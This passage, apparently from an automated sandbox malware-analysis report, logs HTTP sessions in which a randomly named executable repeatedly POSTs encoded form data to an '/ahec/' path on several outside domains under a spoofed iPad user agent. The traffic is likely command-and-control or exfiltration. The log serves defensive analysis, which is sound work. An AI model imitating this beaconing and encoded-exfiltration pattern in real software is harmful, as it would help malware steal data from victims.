                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 66 47 46 6a 6c 39 68 53 34 77 53 2b 6a 7a 59 6a 67 65 70 78 62 42 46 62 73 4e 4f 32 54 67 32 4c 56 65 62 31 65 66 4d 31 78 39 78 61 6d 55 37 79 37 6b 50 37 44 79 57 48 70 68 6c 53 65 4b 67 52 72 58 79 6c 6b 68 6d 52 6a 65 51 4d 37 61 78 32 64 43 72 6f 47 33 67 69 77 4e 61 4c 39 6c 61 32 50 2b 7a 45 2b 2f 73 6b 56 37 6f 4f 69 70 32 74 4b 4e 42 77 35 45 42 62 59 6e 5a 57 4d 66 38 42 79 6d 5a 30 55 34 2f 7a 5a 4a 51 67 37 4d 76 39 30 65 64 57 48 36 43 33 6f 48 64 30 4d 48 66 42 6a 2b 59 6e 72 6c 77 2b 30 54 6a 6e 2f 41 66 6c 4a 74 55 71 5a 6b 64 61 32 2b 48 41 5a 62 72 32 50 59 4b 4a 4d 65 77 3d
                                                                                                                                                            Data Ascii: XveXHZvx=fGFjl9hS4wS+jzYjgepxbBFbsNO2Tg2LVeb1efM1x9xamU7y7kP7DyWHphlSeKgRrXylkhmRjeQM7ax2dCroG3giwNaL9la2P+zE+/skV7oOip2tKNBw5EBbYnZWMf8BymZ0U4/zZJQg7Mv90edWH6C3oHd0MHfBj+Ynrlw+0Tjn/AflJtUqZkda2+HAZbr2PYKJMew=
                                                                                                                                                            Dec 8, 2023 14:51:22.063608885 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:21 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            15192.168.2.449755131.153.147.90805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:24.577001095 CET10855OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.instantconvey.com
                                                                                                                                                            Origin: http://www.instantconvey.com
                                                                                                                                                            Referer: http://www.instantconvey.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 66 47 46 6a 6c 39 68 53 34 77 53 2b 6a 7a 59 6a 67 65 70 78 62 42 46 62 73 4e 4f 32 54 67 32 4c 56 65 62 31 65 66 4d 31 78 39 4a 61 6d 6e 44 79 30 6a 37 37 43 79 57 48 67 42 6c 58 65 4b 68 4a 72 58 72 75 6b 68 71 6e 6a 63 34 4d 70 6f 70 32 5a 48 66 6f 4e 33 67 69 76 39 61 62 79 46 62 32 50 2b 6a 59 2b 2f 38 6b 56 37 6f 4f 69 71 2b 74 44 34 74 77 71 30 42 61 66 6e 5a 53 61 66 38 70 79 6d 41 50 55 34 72 6a 5a 61 59 67 36 73 2f 39 32 73 46 57 49 36 43 31 76 48 64 73 4d 48 43 47 6a 2b 30 42 72 6b 30 55 30 51 2f 6e 37 52 75 4f 61 39 63 30 49 6d 42 6f 6c 39 62 44 58 72 32 37 63 6f 47 57 65 61 50 44 79 71 2b 59 79 54 33 31 38 5a 54 68 4e 76 6a 59 7a 75 6c 49 63 64 2b 68 50 63 58 31 4e 30 64 63 52 79 78 46 5a 76 68 4f 42 71 76 45 56 69 6c 75 59 38 6e 59 4a 74 73 45 44 77 71 6c 45 61 4a 57 44 6c 4f 43 6b 67 58 33 59 48 37 76 6d 57 41 38 68 38 77 67 35 58 73 72 5a 61 74 4e 42 78 6d 4b 72 62 48 54 6d 4f 47 4a 31 33 4b 6d 45 73 34 4f 62 2f 34 6e 35 72 36 73 44 63 45 58 53 55 79 55 74 4d 76 6b 4c 37 52 6c 6f 61 41 4b 46 63 67 69 73 64 2f 75 35 39 6a 65 2b 30 65 49 6a 50 39 41 66 55 34 68 45 37 4e 6a 4c 36 56 34 61 59 55 6c 53 37 69 62 47 45 66 55 67 5a 68 56 35 38 57 50 47 57 50 59 43 48 44 70 47 35 41 33 50 70 76 76 6d 36 66 51 34 73 4b 6a 39 6d 6d 6a 39 6d 72 4d 34 42 4c 4b 65 6f 57 70 62 62 74 2f 41 57 75 7a 50 47 76 48 37 74 4a 4f 5a 36 50 59 6b 71 32 7a 50 69 44 43 57 31 30 68 64 39 79 73 6d 48 54 62 50 63 64 63 48 72 70 6d 4e 45 76 6c 4b 76 46 43 6a 41 43 4a 52 6b 65 46 48 59 34 67 4d 2b 6a 61 4f 33 70 67 33 72 43 56 30 6a 4b 56 54 33 74 45 49 71 68 56 30 52 56 70 72 46 48 35 64 63 43 34 37 35 41 68 47 4f 63 79 79 52 48 61 54 35 47 73 71 37 50 35 33 7a 47 4b 66 7a 38 6a 6f 30 4c 76 31 4a 61 6f 43 4e 63 56 32 6c 6b 2f 59 57 69 74 79 45 34 47 66 53 54 4f 6d 2b 44 64 31 4f 69 4d 57 52 59 73 34 4e 58 57 72 4c 71 6a 6c 63 6a 2b 50 36 68 42 6d 31 51 30 41 72 33 57 58 42 35 46 5a 6e 76 53 75 53 43 59 78 36 39 49 33 46 59 68 46 2b 43 46 51 71 49 6e 5a 6a 58 4a 73 77 63 41 6c 59 34 63 50 72 6d 41 2f 72 45 6f 5a 44 65 6f 51 59 4d 6e 38 58 5a 39 65 39 55 78 32 54 44 63 47 34 65 67 52 52 67 64 51 48 54 35 79 6f 6d 78 6b 43 64 73 78 73 58 63 2b 65 70 31 4b 53 42 44 59 6f 51 4d 6d 43 6e 71 73 63 78 66 6f 6f 73 6d 4c 4d 54 6d 7a 77 31 6b 71 6e 71 47 4b 63 42 36 73 77 6f 4a 76 66 57 33 50 6f 33 79 75 34 48 4e 48 46 79 49 42 76 33 4e 53 59 70 6d 73 6f 77 76 45 4e 4f 33 4e 42 76 66 6c 6f 47 77 57 6c 35 49 67 74 49 71 42 79 33 69 46 34 73 75 6e 2b 79 67 74 50 35 6e 51 44 75 51 77 7a 59 48 47 74 61 59 70 52 50 68 64 50 61 35 64 43 59 30 48 45 2f 51 63 39 4e 68 52 58 4c 30 6f 4f 51 68 63 4d 76 78 50 38 7a 32 52 7a 45 44 36 4d 4b 50 67 34 58 45 50 45 61 44 78 6b 65 62 36 49 42 77 63 4e 75 73 39 6a 65 6d 5a 50 76 75 50 38 68 32 37 42 30 7a 61 35 55 5a 4b 37 4f 45 2f 2b 42 46 45 31 70 45 41 78 4e 64 62 30 57 63 69 2f 4b 77 66 6f 51 73 32 74 33 67 39 48 54 4c 73 34 61 77 5a 69 73 4d 6e 51 70 65 39 37 74 67 4a 69 34 55 6e 44 4c 6a 77 2f 6b 69 63 6b 49 2f 4f 49 6e 49 73 54 54 6d 79 6f 35 31 57 62 30 49 75 56 33 74 63 43 58 46 53 4b 75 45 31 30 68 78 54 66 2f 79 32 75 49 39 79 4b 6e 36 68 45 66 38 35 55 73 57 68 6a 38 36 56 56 6f 47 53 68 66 30 4c 31 2b 6e 7a 2f 2f 35 33 58 30 2f 73 4a 35 7a 31 61 57 6f 67 62 69 50 2b 53 6d 4e 4e 4b 39 54 39 66 5a 78 62 63 78 5a 37 58 35 46 7a 54 54 59 31 4e 46 6b 41 54 41 59 6e 6c 44 61 6b 79 32 56 50 5a 4b 45 44 71 45 51 77 4f 51 63 35 4e 31 74 4a 70 35 31 54 56 37 75 32 58 67 2b 6f 74 55 68 6d 4f 31 79 4e 44 37 31 46 5a 2f 45 4b 59 41 63 52 6a 6b 37 38 2b 4f 64 45 37 63 5a 44 42 6a 55 4b 43 37 76 36 51 77 39 62 49 6f 72 33 32 71 32 58 66 51 4b 31 54 4a 44 37 62 32 51 66 43 53 47 71 48 78 33 39 65 39 4d 37 67 65 7a 35 48 4e 33 67 63 71 41 4f 6d 32 76 72 6a 48 35 37 59 67 56 6c 48 42 7a 4e 49 5a 30 73 65 4e 59 50 47 4e 59 43 69 4e 32 6a 44 6a 4e 65 74 37 59 65 54 36 33 45 34 72 46 71 73 7a 4c 32 46 57 61 32 34 2f 4a 57 69 67 59 44 65 78 4c 4f 55 70 38 50 50 30 70 57 35 35 4d 38 45 42 73 77 66 6a 57 6f 44 2f 55 6a 32 7a 32 47 6b 33 70 37 6a 56 6e 6d 57 64 64 6a 6c 50 76 64 57 71 33 75 73
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:51:24.753015041 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:24 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            16192.168.2.449756131.153.147.90805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:27.263885975 CET474OUTGET /ahec/?XveXHZvx=SEtDmKR01RO/v1ckzNpTcUhCl/PMZGqFQ+LqZaILuKhM8xDFx1nbKCOFshx5Sqoz6Az3phyVzpkjs7F2QS7YIFIq1ILz0nKZVg==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.instantconvey.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:51:27.422880888 CET479INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:27 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Length: 315
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            17192.168.2.44975794.23.162.163805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:33.044251919 CET768OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Origin: http://www.domainappraisalbot.com
                                                                                                                                                            Referer: http://www.domainappraisalbot.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 7a 44 68 65 38 73 5a 4b 48 2b 6e 4e 73 46 4f 30 62 34 78 35 6c 45 74 72 6d 5a 72 57 4b 4b 45 62 32 47 72 2b 70 5a 41 63 35 44 6a 41 77 37 51 59 66 43 48 58 41 31 77 59 33 33 32 74 54 5a 6b 33 55 63 47 30 76 63 49 61 77 4c 38 37 4e 44 64 41 36 34 32 75 71 6d 51 32 45 79 72 7a 46 69 4f 6b 68 39 6f 31 37 6a 55 57 67 50 73 53 45 66 2b 35 5a 67 43 38 36 4c 63 49 58 61 56 6b 6f 33 37 4b 72 4d 50 6f 61 63 6f 54 33 6f 6b 55 50 79 46 6c 31 35 31 46 67 56 73 72 70 51 59 4e 57 79 50 32 32 43 6f 75 5a 41 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=WDRpQvXLf5KbzDhe8sZKH+nNsFO0b4x5lEtrmZrWKKEb2Gr+pZAc5DjAw7QYfCHXA1wY332tTZk3UcG0vcIawL87NDdA642uqmQ2EyrzFiOkh9o17jUWgPsSEf+5ZgC86LcIXaVko37KrMPoacoT3okUPyFl151FgVsrpQYNWyP22CouZA==


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            18192.168.2.44975894.23.162.163805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:35.798079014 CET788OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.domainappraisalbot.com
                                                                                                                                                            Origin: http://www.domainappraisalbot.com
                                                                                                                                                            Referer: http://www.domainappraisalbot.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 57 44 52 70 51 76 58 4c 66 35 4b 62 70 69 52 65 77 74 5a 4b 47 65 6e 4f 77 56 4f 30 55 59 78 39 6c 44 6c 72 6d 63 54 47 4a 34 51 62 34 44 58 2b 6f 59 41 63 2b 44 6a 41 37 62 51 64 62 43 47 36 41 31 4d 68 33 7a 32 74 54 5a 67 33 55 64 32 30 6f 71 41 5a 79 62 38 39 43 6a 64 47 33 59 32 75 71 6d 51 32 45 79 2f 4a 46 6d 69 6b 6d 4d 59 31 36 47 30 58 68 50 73 52 53 50 2b 35 64 67 43 34 36 4c 63 32 58 65 56 4f 6f 31 7a 4b 72 4a 6a 6f 5a 4e 6f 55 35 6f 6b 61 46 53 46 37 38 4a 73 38 31 57 6c 71 71 68 63 30 55 6d 65 64 2b 33 45 39 65 30 38 50 4f 78 4d 67 66 6c 5a 69 6f 75 39 6d 6f 61 66 41 73 4a 73 3d
                                                                                                                                                            Data Ascii: XveXHZvx=WDRpQvXLf5KbpiRewtZKGenOwVO0UYx9lDlrmcTGJ4Qb4DX+oYAc+DjA7bQdbCG6A1Mh3z2tTZg3Ud20oqAZyb89CjdG3Y2uqmQ2Ey/JFmikmMY16G0XhPsRSP+5dgC46Lc2XeVOo1zKrJjoZNoU5okaFSF78Js81Wlqqhc0Umed+3E9e08POxMgflZiou9moafAsJs=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            19192.168.2.44975994.23.162.163805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:51:39.448764086 CET10870OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
